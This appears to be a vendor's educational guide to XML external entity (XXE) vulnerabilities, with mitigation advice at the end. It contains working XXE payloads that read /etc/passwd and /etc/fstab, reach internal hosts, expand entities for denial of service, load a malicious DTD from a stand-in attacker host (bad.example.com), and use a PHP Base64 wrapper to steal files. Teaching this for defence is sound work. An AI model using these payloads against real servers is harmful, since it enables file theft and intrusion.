XML external entity (XXE) vulnerabilities (also called XML external entity injections or XXE injections) happen if a web application or API accepts unsanitized XML data and its back-end XML parser is configured to allow external XML entity parsing. XXE vulnerabilities can let malicious hackers perform attacks such as server-side request forgery (SSRF), local file inclusion (LFI), directory traversal, remote code execution (RCE), network port scanning, and denial of service (DoS).
Severity: |
![]() ![]() ![]() ![]() |
severe |
Prevalence: |
![]() |
discovered rarely |
Scope: |
![]() |
may appear in web apps and APIs that accept XML input |
Technical impact: | SSRF, LFI, RCE, DoS | |
Worst-case consequences: | full system compromise | |
Quick fix: | configure the XML parser to disallow XML external entities |
Note that XXE vulnerabilities were first featured in the OWASP Top 10 list in 2017 and immediately made it to the A4 spot. In the OWASP Top 10 for 2022, they are grouped with security misconfigurations under A5.
For XXE attacks to be possible, a web application or API needs to meet several specific requirements:
To understand what makes this security vulnerability possible, we need to start with some XML basics.
Web applications and APIs often use the extensible markup language (XML) to communicate with one another and to accept structured data from users. Common use cases include:
To provide such functionality, the web application or API uses a back-end XML parser – usually an imported library written in the same language as the application. Examples include SimpleXML for PHP, DocumentBuilder for Java, ElementTree for Python, XmlReader for .NET, or DomParser for JavaScript.
Before an XML parser can process XML input, you need to declare the structure of valid input documents. Knowing this, the parser can determine whether the input data is a valid XML document of an expected type and then process its content. There are two formats for defining the document type: the more powerful and complex XML schema definitions (XSD) and the simpler, older document type definitions (DTD). DTDs are sometimes considered outdated (they are derived from SGML, the ancestor of XML), but are still used very often.
XML entities are placeholder parameters representing characters that are not easily typed or have special meaning. Entities are defined in a DTD using the <!ENTITY>
element. To refer to a defined entity, you use its name preceded by an ampersand (&
) and followed by a semicolon (;
). You may be familiar with entities in HTML, for example, &
and
.
One use for XML entities in DTDs is to incorporate external content or references into the DTD itself, or into documents that use the DTD. Such inclusions are called external XML entities (XXE). XXEs can be abused by malicious hackers to access local files, URLs on a local network, and more.
There are three basic types of XXE attacks: in-band XXE, out-of-band XXE, and blind XXE.
In this guide, we will focus on in-band XXE attacks, but the techniques described here can also be used for OOB XXE and blind XXE attacks.
XXE attacks are performed by defining malicious XML entities in user input that will be parsed by a back-end XML parser. Here is an example of a simple (non-malicious) XML external entity definition:
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World">
]>
<foo>
Hello &bar;
</foo>
Response:
HTTP/1.0 200 OK
Hello World
XML external entity definitions can themselves contain other entity definitions. This allows an attacker to create a recursive structure of calls that requires very little input data but can produce a lot of output. Such output may be used to exhaust the XML processor memory and potentially even overload the web server. By extending the following example with even more entities, an attacker could easily create an entity so large that it would exhaust the memory of any XML parser that tried to process it, resulting in a denial of service.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
Hello &t3;
</foo>
Response:
HTTP/1.0 200 OK
Hello World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World World
XXE definitions may include URL schemes such as file: in entity values. As a result, an attacker can include a reference to a file in the local file system that is accessible from the web server. This could be, for example, a file such as /etc/passwd or one of the source code files of the web application. The results of such an attack are similar to a local file inclusion attack combined with directory traversal.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
Response:
HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
XXE definitions may also contain URLs that link to external resources. Since the request to the URL is made from the web application itself because that’s where the XML is parsed, this allows for server-side request forgery. The attacker can then access files on the local network as if located inside that network, thus bypassing protection such as firewalls.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"http://192.168.0.1/secret.txt">
]>
<foo>
&xxe;
</foo>
Response:
HTTP/1.0 200 OK
Content of the secret.txt file on the local network (behind the firewall)
There is one major limitation when using XXE to exfiltrate data. The entire response is parsed as XML, so if the exfiltrated data contains or even only resembles XML, it will also be parsed as XML. This can cause a parser error or scramble the exfiltrated data:
Request:
POST http://example.com/xml HTTP/1.1
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"file:///etc/fstab">
]>
<foo>
&bar;
</foo>
Response:
HTTP/1.0 500 Internal Server Error
File "file:///etc/fstab", line 3
lxml.etree.XMLSyntaxError: Specification mandate value for attribute system, line 3, column 15...
As a result, simple XXE attacks can only be used to obtain files or responses that are considered valid XML by the parser, meaning that you cannot use them to obtain binary files.
XML itself includes a workaround for this problem. There are legitimate cases when you may need to store XML special characters in XML files. For this purpose, XML provides CDATA
(character data) tags that can contain any special characters:
<data><![CDATA[ < " ' & > characters are ok in here ]]></data>
In addition to general entities, XML also supports parameter entities. Parameter entities are only used in document type definitions (DTDs).
A parameter entity starts with the %
character. This character instructs the XML parser that a parameter entity is being defined, as opposed to a general entity. In the following non-malicious example, a parameter entity is used to define a general entity which is then called from the XML document.
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % paramEntity
"<!ENTITY genEntity 'bar'>">
%paramEntity;
]>
<data>&genEntity;</data>
Response:
HTTP/1.0 200 OK
bar
By combining parameter entities and CDATA
tags, an attacker can create a malicious DTD hosted on bad.example.com/evil.dtd:
Request:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM
"http://bad.example.com/evil.dtd">
%dtd;
%all;
]>
<data>&fileContents;</data>
Attacker DTD (bad.example.com/evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents
'%start;%file;%end;'>">
When an attacker sends the above XXE payload, the XML parser will first attempt to process the %dtd
parameter entity by making a request to http://bad.example.com/evil.dtd. After the attacker’s DTD has been downloaded, the XML parser will load the %file
parameter entity (from evil.dtd), which in this example points to /etc/fstab. Next, the parser wraps the contents of the file in CDATA
tags defined using the %start
and %end
parameter entities. Finally, everything gets stored in yet another parameter entity called %all
.
The heart of the trick is that %all
actually defines a general entity called &fileContents
that can be included as part of the response. The end result is the contents of the /etc/fstab file wrapped in CDATA
tags.
If the web application vulnerable to XXE is a PHP application, new attack vectors open up thanks to PHP protocol wrappers. PHP protocol wrappers are I/O streams that allow access to PHP input and output streams.
An attacker can use the PHP/filter protocol wrapper to Base64-encode the contents of a file. Since Base64 will always be treated as valid XML data, an attacker can simply encode files on the server and then decode them on the receiving end. Crucially, this method allows the attacker to steal binary files, too.
Request:
POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>
Response:
HTTP/1.0 200 OK
IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0gaW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3RlbT4gPG1vdW50IHBvaW50PiAgIDx0eXBlPiAgPG9wdGlvbnM+ICAgICAgIDxkdW1wPiAgPHBhc3M+DQoNCnByb2MgIC9wcm9jICBwcm9jICBkZWZhdWx0cyAgMCAgMA0KIyAvZGV2L3NkYTUNClVVSUQ9YmUzNWE3MDktYzc4Ny00MTk4LWE5MDMtZDVmZGM4MGFiMmY4ICAvICBleHQzICByZWxhdGltZSxlcnJvcnM9cmVtb3VudC1ybyAgMCAgMQ0KIyAvZGV2L3NkYTYNClVVSUQ9Y2VlMTVlY2EtNWIyZS00OGFkLTk3MzUtZWFlNWFjMTRiYzkwICBub25lICBzd2...
If the XML parser used by a web application supports XML external entities, attackers can use the techniques described above to abuse XXE definitions and perform a variety of attacks, including:
The best way to detect XXE vulnerabilities depends on whether they are already known or unknown.
Since XXE is considered a type of XML injection attack, some sources will simply recommend input validation and sanitization of XML documents through filtering and escaping to prevent potentially harmful content from being interpreted as XML. This also includes creating whitelists and blacklists for XML content. However, we do not recommend this approach since, due to the way that XML input is used by most applications, it is not practical to apply manual sanitization and validation.
A large part of XML communication between web applications and APIs (as well as communication with users) involves passing complete XML documents, so filtering and escaping all content in such documents is very troublesome and, unless done properly, can make the entire document invalid. Following OWASP documentation, we recommend that instead of trying to prevent XXE in specific applications, developers and web server administrators should work together to implement general mitigation guidelines by disallowing XML external entities on the level of the XML parser, not the web application.
The only effective way to mitigate XXE attacks is to completely prevent developers from using XML external entities in XML content coming from untrusted sources. OWASP additionally recommends completely disabling the processing of external document type definitions and restricting developers only to static, local DTDs. If the functionality of your web application depends on the use of external DTDs, you can prevent XXE attacks by disabling support for external entities in external DTDs.
To learn how to disable DTD and XXE processing in your specific XML parser, refer to the relevant OWASP XXE prevention cheat sheet, which contains instructions for many commonly used programming languages and XML parsers.
Classification | ID |
---|---|
CAPEC | 201 |
CWE | 611 |
WASC | 43 |
OWASP 2021 | A5 |
XXE vulnerabilities are caused by the permissive configuration of XML parsers. XML parsers used by web servers often allow the use of XML entities from external sources. Attackers may abuse this feature and use XML external entities to include malicious content or access sensitive information.
External XML entities may allow an attacker to access confidential information as well as perform server-side request forgery (SSRF) attacks. In some cases, XXE may even enable port scanning or lead to remote code execution.
The best way to prevent XXE vulnerabilities is to completely disable support for document type definitions (DTDs) in your XML parser. If this is not possible, you need to at least disable support for external entities and external document type declarations for your parser.